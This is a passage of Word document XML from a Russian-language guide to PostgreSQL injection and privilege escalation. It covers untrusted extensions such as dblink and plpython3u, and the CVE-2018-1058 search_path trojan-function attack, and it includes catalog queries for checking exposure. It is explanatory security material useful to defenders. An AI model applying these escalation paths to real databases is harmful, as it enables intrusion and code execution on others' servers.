        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE USER app_user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) не имеет ни </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SUPERUSER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ни одной из перечисленных предопределённых ролей. Чтобы инъекция в application-роль превратилась в RCE через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COPY PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, кому-то — администратору или предыдущей цепочке — нужно явно выдать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_execute_server_program</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Это не значит, что атака невозможна; это значит, что в первую очередь применимы каналы, не требующие специальных привилегий: UNION-based, error-based, blind, OOB через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (если расширение установлено и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>USAGE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> выдан </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAA5ED2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>2.3 Расширения: trusted vs untrusted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46048F6E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Расширения в PostgreSQL — это пакеты SQL-скриптов, функций и иногда C-кода, ставящиеся через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE EXTENSION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Поверхность атаки они меняют сильно: например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> превращает кластер из локально-замкнутого в способный делать исходящие TCP-коннекты, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plpython3u</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> даёт прямой shell как ОС-процесс postgres.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FF5397" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">До PG 13 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE EXTENSION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> требовал </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SUPERUSER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для всех расширений без исключения. С </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PG 13</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> введено понятие trusted extension: расширения, помеченные </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>trusted = true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в control-файле, можно установить любому пользователю, имеющему </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на целевой БД. Untrusted — по-прежнему только суперюзер.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59369F85" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Из contrib-сборки PostgreSQL значительная часть расширений помечена как trusted — среди них и совершенно безобидные (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hstore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_trgm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>citext</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pgcrypto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>unaccent</w:t>
      </w:r>
      <w:r>
        <w:t>), и потенциально опасные при цепочке эскалации (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plperl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в trusted-режиме, см. 3.7.2). Untrusted остаются те, что дают прямой доступ к ОС, сети или файловой системе. Канонический список для конкретного кластера — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_available_extensions</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F929F17" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT name, default_version, trusted FROM pg_available_extensions ORDER BY trusted DESC, name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EDECCD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Untrusted расширения, релевантные для инъекций:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A25E33" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — TCP-коннекты к другим PostgreSQL (3.6.1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70048951" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres_fdw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — foreign data wrapper, делает SSRF-каналы (3.6.2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7914CA81" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>file_fdw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — чтение файлов как таблиц (родственник 3.6.3).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA9B9C4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>plperlu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plpython3u</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plsh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — untrusted процедурные языки с прямым доступом к ОС (3.7.2, 3.7.3).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63485444" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>adminpack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — устаревшее, давало </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_file_*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> функции для pgAdmin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D59A27" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ключевая тонкость: trust регулирует установку, а не использование. После того, как суперюзер выполнил </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE EXTENSION dblink</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, функции расширения становятся обычными SQL-функциями, на которые действуют обычные правила </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GRANT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. По умолчанию </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>USAGE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на установленные функции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink_*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> выдан </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — то есть любой аутентифицированный пользователь может их вызывать. Это не баг и не недосмотр, это документированное поведение, но в моделировании угроз об этом часто забывают.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6587C81F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>2.4 search_path и схема public</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25153411" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>search_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это упорядоченный список схем, в которых PostgreSQL ищет объект, когда тот указан без явной квалификации (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>func()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> вместо </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>myschema.func()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Дефолтное значение — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"$user", public</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Это значит: сначала ищется схема с именем текущего пользователя (если её нет — пропускается), затем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397B2BBF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Механизм сам по себе нейтрален, но в сочетании с дефолтной привилегией </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> он давал многолетний канал эскалации, известный как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE-2018-1058 / search_path attack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Сценарий: атакующий с минимальными правами создаёт в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> функцию с именем, совпадающим с какой-нибудь стандартной — например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lower(text)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Когда суперюзер выполняет запрос, использующий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lower()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без квалификации, PostgreSQL разрешает имя через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>search_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Если порядок резолюции попадёт на функцию в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (а это происходит, если её сигнатура «лучше» совпадает), будет выполнена пользовательская функция, причём от имени суперюзера. Дальше — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SECURITY DEFINER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> цепочки или прямой RCE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454A015F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">С </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PG 15</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> initdb по умолчанию делает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>REVOKE CREATE ON SCHEMA public FROM PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Это закрывает классическую форму атаки: некому посадить trojan-функцию. Важный нюанс — изменение применяется только к новым кластерам. Кластеры, прошедшие через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_upgrade</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с PG 14 или раньше, сохраняют старые привилегии в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:t>, и атака на них работает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43238230" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Проверить состояние конкретного кластера можно двумя способами. Прямой булев ответ для произвольной роли:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44463BC3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT has_schema_privilege('public', 'public', 'CREATE');  -- роль PUBLIC, схема public, привилегия CREATE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556F76E3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Или через ACL в системном каталоге:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3030D482" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT nspname, nspacl FROM pg_namespace WHERE nspname = 'public';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C55443C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ACL-записи в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nspacl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> имеют формат </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>grantee=privileges/grantor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Пустая строка до </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> означает роль </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; буквы между </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — коды привилегий (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
